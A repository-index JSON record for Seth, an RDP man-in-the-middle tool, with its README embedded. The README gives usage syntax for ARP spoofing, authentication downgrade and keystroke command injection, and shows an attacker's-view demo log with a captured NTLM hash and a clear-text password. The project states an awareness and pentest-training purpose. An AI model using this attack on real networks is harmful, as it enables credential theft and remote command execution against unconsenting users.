{"id":13585665,"url":"https://github.com/SySS-Research/Seth","last_synced_at":"2025-04-07T10:31:23.771Z","repository":{"id":46126820,"uuid":"84575372","full_name":"SySS-Research/Seth","owner":"SySS-Research","description":"Perform a MitM attack and extract clear text credentials from RDP connections","archived":false,"fork":false,"pushed_at":"2023-02-09T14:29:05.000Z","size":2023,"stargazers_count":1418,"open_issues_count":15,"forks_count":322,"subscribers_count":89,"default_branch":"master","last_synced_at":"2025-04-01T09:34:27.896Z","etag":null,"topics":["arp-spoofing","mitm","proof-of-concept","rdp","security"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/SySS-Research.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2017-03-10T15:46:38.000Z","updated_at":"2025-03-28T08:16:42.000Z","dependencies_parsed_at":"2024-01-07T22:50:10.092Z","dependency_job_id":"239c149d-a1b8-4188-8d69-6c3fcf0d1b5c","html_url":"https://github.com/SySS-Research/Seth","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SySS-Research%2FSeth","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SySS-Research%2FSeth/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SySS-Research%2FSeth/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SySS-Research%2FSeth/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/SySS-Research","download_url":"https://codeload.github.com/SySS-Research/Seth/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247636312,"owners_count":20970901,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["arp-spoofing","mitm","proof-of-concept","rdp","security"],"created_at":"2024-08-01T15:05:04.221Z","updated_at":"2025-04-07T10:31:23.090Z","avatar_url":"https://github.com/SySS-Research.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"Seth\n====\n\nSeth is a tool written in Python and Bash to MitM RDP connections by\nattempting to downgrade the connection in order to extract clear text\ncredentials. It was developed to raise awareness and educate about the\nimportance of properly configured RDP connections in the context of\npentests, workshops or talks. The author is Adrian Vollmer (SySS GmbH).\n\nUsage\n-----\n\nRun it like this:\n\n    $ ./seth.sh \u003cINTERFACE\u003e \u003cATTACKER IP\u003e \u003cVICTIM IP\u003e \u003cGATEWAY IP|HOST IP\u003e [\u003cCOMMAND\u003e]\n\nUnless the RDP host is on the same subnet as the victim machine, the last IP\naddress must be that of the gateway.\n\nThe last parameter is optional. It can contain a command that is executed on\nthe RDP host by simulating WIN+R via key press event injection. Keystroke\ninjection depends on which keyboard layout the victim is using - currently\nit's only reliable with the English US layout. I suggest avoiding special\ncharacters by using `powershell -enc \u003cSTRING\u003e`, where STRING is your\nUTF-16le and Base64 encoded command.  However, `calc` should be pretty\nuniversal and gets the job done.\n\nThe shell script performs ARP spoofing to gain a Man-in-the-Middle position\nand redirects the traffic such that it runs through an RDP proxy. The proxy\ncan be called separately. This can be useful if you want use Seth in\ncombination with Responder. Use Responder to gain a Man-in-the-Middle\nposition and run Seth at the same time. Run `seth.py -h` for more\ninformation:\n\n    usage: seth.py [-h] [-d] [-f] [-p LISTEN_PORT] [-b BIND_IP] [-g {0,1,3,11}]\n                   [-j INJECT] -c CERTFILE -k KEYFILE\n                   target_host [target_port]\n\n    RDP credential sniffer -- Adrian Vollmer, SySS GmbH 2017\n\n    positional arguments:\n      target_host           target host of the RDP service\n      target_port           TCP port of the target RDP service (default 3389)\n\n    optional arguments:\n      -h, --help            show this help message and exit\n      -d, --debug           show debug information\n      -f, --fake-server     perform a 'fake server' attack\n      -p LISTEN_PORT, --listen-port LISTEN_PORT\n                            TCP port to listen on (default 3389)\n      -b BIND_IP, --bind-ip BIND_IP\n                            IP address to bind the fake service to (default all)\n      -g {0,1,3,11}, --downgrade {0,1,3,11}\n                            downgrade the authentication protocol to this (default\n                            3)\n      -j INJECT, --inject INJECT\n                            command to execute via key press event injection\n      -c CERTFILE, --certfile CERTFILE\n                            path to the certificate file\n      -k KEYFILE, --keyfile KEYFILE\n                            path to the key file\n\nFor more information read the PDF in `doc/paper` (or read the code!). The\npaper also contains recommendations for counter measures.\n\nYou can also watch a twenty minute presentation including a demo (starting\nat 14:00) on Youtube: https://www.youtube.com/watch?v=wdPkY7gykf4\n\nOr watch just the demo (with subtitles) here:\nhttps://www.youtube.com/watch?v=JvvxTNrKV-s\n\nDemo\n----\n\nThe following ouput shows the attacker's view. Seth sniffs an offline\ncrackable hash as well as the clear text password. Here, NLA is not enforced\nand the victim ignored the certificate warning.\n\n![Seth](https://github.com/SySS-Research/Seth/blob/master/doc/img/seth-logo.png)\n\n    # ./seth.sh eth1 192.168.57.{103,2,102}\n    ███████╗███████╗████████╗██╗  ██╗\n    ██╔════╝██╔════╝╚══██╔══╝██║  ██║   by Adrian Vollmer\n    ███████╗█████╗     ██║   ███████║   seth@vollmer.syss.de\n    ╚════██║██╔══╝     ██║   ██╔══██║   SySS GmbH, 2017\n    ███████║███████╗   ██║   ██║  ██║   https://www.syss.de\n    ╚══════╝╚══════╝   ╚═╝   ╚═╝  ╚═╝\n    [*] Spoofing arp replies...\n    [*] Turning on IP forwarding...\n    [*] Set iptables rules for SYN packets...\n    [*] Waiting for a SYN packet to the original destination...\n    [+] Got it! Original destination is 192.168.57.102\n    [*] Clone the x509 certificate of the original destination...\n    [*] Adjust the iptables rule for all packets...\n    [*] Run RDP proxy...\n    Listening for new connection\n    Connection received from 192.168.57.103:50431\n    Downgrading authentication options from 11 to 3\n    Enable SSL\n    alice::avollmer-syss:1f20645749b0dfd5:b0d3d5f1642c05764ca28450f89d38db:0101000000000000b2720f48f5ded2012692fcdbf5c79a690000000002001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0001001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0004001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0003001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0007000800b2720f48f5ded20106000400020000000800300030000000000000000100000000200000413a2721a0d955c51a52d647289621706d6980bf83a5474c10d3ac02acb0105c0a0010000000000000000000000000000000000009002c005400450052004d005300520056002f003100390032002e003100360038002e00350037002e00310030003200000000000000000000000000\n    Tamper with NTLM response\n    TLS alert access denied, Downgrading CredSSP\n    Connection lost\n    Connection received from 192.168.57.103:50409\n    Listening for new connection\n    Enable SSL\n    Connection lost\n    Connection received from 192.168.57.103:50410\n    Listening for new connection\n    Enable SSL\n    Hiding forged protocol request from client\n    .\\alice:ilovebob\n    Keyboard Layout: 0x409 (English_United_States)\n    Key press:   LShift\n    Key press:   S\n    Key release:                 S\n    Key release:                 LShift\n    Key press:   E\n    Key release:                 E\n    Key press:   C\n    Key release:                 C\n    Key press:   R\n    Key release:                 R\n    Key press:   E\n    Key release:                 E\n    Key press:   T\n    Key release:                 T\n    Connection lost\n    [*] Cleaning up...\n    [*] Done.\n\nRequirements\n------------\n\n* `python3`\n* `tcpdump`\n* `arpspoof`\n\n  `arpspoof` is part of `dsniff`\n* `openssl`\n\n\nDisclaimer\n----------\n\nUse at your own risk. Do not use without full consent of everyone involved.\nFor educational purposes only.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FSySS-Research%2FSeth","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FSySS-Research%2FSeth","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FSySS-Research%2FSeth/lists"}